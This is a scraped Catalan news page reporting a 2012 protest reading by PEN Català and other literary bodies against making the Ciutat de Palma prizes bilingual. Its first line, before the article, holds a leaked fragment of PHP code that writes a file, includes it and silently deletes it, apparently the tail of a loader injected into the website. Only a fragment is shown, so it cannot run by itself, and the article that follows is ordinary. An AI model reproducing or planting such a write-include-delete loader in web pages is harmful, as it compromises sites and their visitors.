");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Lectura reivindicativa 'per uns premis Ciutat de Palma de prestigi i en català'
Cercador de Notícies
Calendari de notícies
20/01/2012 Vilaweb

Lectura reivindicativa 'per uns premis Ciutat de Palma de prestigi i en català'

El PEN Català, l'Associació d'Escriptors en Llengua Catalana i l'Obra Cultural Balear fan un acte de protesta per la desvirtuació del certamen literari.
Més de tres-cents cinquanta autors i entitats van signar l'octubre passat un manifest en defensa del prestigi dels Premis Ciutat de Palma i contra la decisió municipal d'introduir el castellà en la convocatòria d'enguany. Avui el PEN Català, l'Associació d'Escriptors en Llengua Catalana i l'Obra Cultural Balear faran una lectura reivindicativa de textos literaris oberta a la participació. A les vuit del vespre, a Ca n'Alcover %u2013 Espai de Cultura.
'Som més de tres-cents cinquanta els autors i les entitats que hem expressat, d’aquesta manera, la defensa de la nostra identitat i de la nostra literatura. Però volem fer-nos sentir encara més fort', diuen els organitzadors. Amb l'acte d'avui afirmen que volen expressar 'el rebuig a les agressions de què són objecte la llengua, la cultura i la literatura catalanes a Palma i, en general, a les Illes'.
En el manifest, els autors i les entitats signants recorden que 'els premis literaris Ciutat de Palma, instituïts per l’ajuntament de la ciutat l’any 1955, des de l’any 1979, i des que tenim autogovern, s'han dedicat a premiar obres de creació literària en llengua catalana'. Consideren 'inadmissible, ara, la convocatòria d’uns guardons bilingües, en una decisió presa de manera unilateral i sense ni tan sols consultar i escoltar els autors, perquè representa una involució de caràcter cultural injustificable i arbitrària que només pot comportar desprestigi i desafecció'. Per tot això, denuncien 'el menyspreu i la indiferència envers la llengua pròpia que demostra l’equip de govern de la ciutat de Palma amb mesures com aquesta'.


Anar a notícia


Recomanar
Comentar
Comentaris (0)